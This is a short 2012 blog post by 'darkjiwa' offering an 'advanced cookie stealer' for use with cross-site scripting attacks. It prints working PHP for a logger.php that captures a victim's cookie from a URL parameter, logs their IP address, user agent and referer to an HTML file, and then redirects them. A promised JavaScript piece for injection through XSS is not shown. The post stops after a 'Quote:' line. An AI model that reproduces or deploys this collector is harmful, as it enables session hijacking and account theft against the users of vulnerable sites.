[+] Post Title :
[+] Date : 28 February 2012
[+] Author : darkjiwa
[+] Link : https://darkjiwa.blogspot.com/2012/02/advanced-cookie-stealer-with-pagination.html
[+] Type : rwxr-xr-x
I've worked lately on an cookie logger that makes it much easier browsing cookies and the way it logs it :) Advanced cookie stealer with pagination
[+] Date : 28 February 2012
[+] Author : darkjiwa
[+] Link : https://darkjiwa.blogspot.com/2012/02/advanced-cookie-stealer-with-pagination.html
[+] Type : rwxr-xr-x
Image :
Installation steps :
1 ) Logger
( logger.php )
PHP Code:
$cookie = $HTTP_GET_VARS["cookie"];$date = date ("j F Y h:i:s A");$ip = $_SERVER['REMOTE_ADDR'];$agent = $_SERVER['HTTP_USER_AGENT'];$referer = $_SERVER['HTTP_REFERER'];$file = fopen('logs.html', 'a');fwrite($file, "\n \n Cookies : $cookie
\n Date : $date
\n IP : $ip
\n\n Referer : $referer
\n Agent : $agent
\n
\n\n");fclose($file);header( 'Location: http://www.redirectURL.com' ) ;?>
2 ) JS logger
( logger.js )
This to insert it in your XSS directly through
Quote:
0 comments:
Post a Comment